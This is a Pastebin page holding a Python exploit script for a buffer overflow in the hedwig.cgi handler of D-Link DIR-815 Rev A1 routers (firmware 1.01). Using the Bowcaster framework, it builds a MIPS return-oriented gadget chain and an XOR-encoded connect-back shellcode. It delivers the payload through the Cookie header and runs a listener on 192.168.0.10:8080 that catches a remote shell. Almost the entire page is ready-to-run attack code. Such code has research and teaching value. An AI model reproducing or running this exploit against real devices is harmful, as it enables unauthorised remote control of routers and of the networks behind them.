Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- #Author: Zachary Cutlip
- # uid000 AT gmail dot com
- # Twitter:@zcutlip
- #Target: DIR-815 Rev A1
- #Firmware: 1.01
- #hedwig.cgi buffer overflow in HTTP header field Cookie: uid="<cookie value>"
- import sys
- from bowcaster.development import OverflowBuffer
- from bowcaster.development import SectionCreator
- from bowcaster.common.support import LittleEndian
- from bowcaster.common.support import Logging
- from bowcaster.payloads.mips.connectback_payload import ConnectbackPayload
- from bowcaster.servers.connectback_server import ConnectbackServer
- from bowcaster.encoders.mips import MipsXorEncoder
- from bowcaster.clients.http import HttpClient
- CALLBACK_IP="192.168.0.10"
- def build_overflow(logger=None):
- badchars=["\x00","\x20","\r","\n","\""]
- libc_base_address=0x2aaf8000
- reg_s0=1007
- reg_s1=1011
- reg_s2=1015
- reg_s3=1019
- reg_s4=1023
- reg_s5=1027
- reg_s6=1031
- reg_s7=1035
- reg_pc=1043
- reg_new_ra=1075
- stack_return=1351
- SC=SectionCreator(LittleEndian,base_address=libc_base_address,badchars=badchars,logger=logger)
- ###########################################################################
- # Stages a 2 sec arg to sleep() in $a0
- # Stages 0x20+var4($sp) in $ra; return address for sleep()
- # Jumps to $s0
- ###########################################################################
- SC.gadget_section(reg_pc,0x0004FA3C,
- description="stage arg to sleep in $a0, stage return from sleep in $ra,jalr $s0")
- ###########################################################################
- # Address of sleep() function
- ###########################################################################
- SC.gadget_section(reg_s0,0x56bd0,description="Address of sleep()")
- ###########################################################################
- # Stackfinder. Load the following:
- # $s4=$sp+0x5d0+var_5b4
- # $s2=$sp+0x5d0+var_428
- # $s0=$sp+0x5d0+var_4c0
- # Then jalr $s6
- ###########################################################################
- SC.gadget_section(reg_new_ra,0x000255FC,
- description="Sleep() returns here.")
- ###########################################################################
- # Jalr to $s0, which should point to the stack.
- ###########################################################################
- SC.gadget_section(reg_s6,0x000159D8,description="jalr to $s0")
- payload=ConnectbackPayload(CALLBACK_IP,LittleEndian)
- encoded_payload=MipsXorEncoder(payload,badchars=badchars,logger=logger)
- SC.string_section(1351,encoded_payload.shellcode,
- description="XOR Encoded connect-back payload. connects back to 192.168.0.10:8080.")
- buf=OverflowBuffer(LittleEndian,2048,overflow_sections=SC.section_list,logger=logger)
- return buf
- def send_overflow(buf,target_ip,logger):
- client=HttpClient()
- headers={}
- headers["Referer"]="http://192.168.0.1/bsc_wlan.php"
- headers["Content-Type"]="application/x-www-form-urlencoded; charset=UTF-8"
- headers["Connection"]="keep-alive"
- headers["Cookie"]="uid=%s" % str(buf)
- url="http://%s/hedwig.cgi" % target_ip
- post_data='SERVICES=WIFI.PHYINF,RUNTIME.PHYINF,RUNTIME.DFS'
- logger.LOG_INFO("Sending post request.")
- try:
- client.send(url,headers=headers,post_data=post_data,urlencode=True)
- except Exception as e:
- print e
- return
- def find_offset(buf,find_data):
- if find_data.startswith("0x"):
- find_data=int(find_data,0)
- Logging().LOG_DEBUG("Finding %#010x" % find_data)
- offset=buf.find_offset(find_data)
- return offset
- def main(command):
- logger=Logging()
- logger.LOG_INFO("Bulding overflow.")
- buf=build_overflow(logger)
- if command.startswith("find="):
- find_string=command.split("find=")[1]
- offset=find_offset(buf,find_string)
- logger.LOG_INFO("Offset of %s: %d" %(find_string,offset))
- sys.exit(0)
- logger.LOG_INFO("Starting server.")
- server=ConnectbackServer(CALLBACK_IP,port=8080,logger=logger)
- pid=server.serve()
- target_ip=command
- if pid:
- try:
- send_overflow(buf,target_ip,logger)
- server.wait()
- except Exception as e:
- print e
- server.shutdown()
- else:
- logger.LOG_WARN("Failed to start connect-back server.")
- sys.exit(1)
- logger.LOG_INFO("Done.")
- if __name__=="__main__":
- main(sys.argv[1])
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement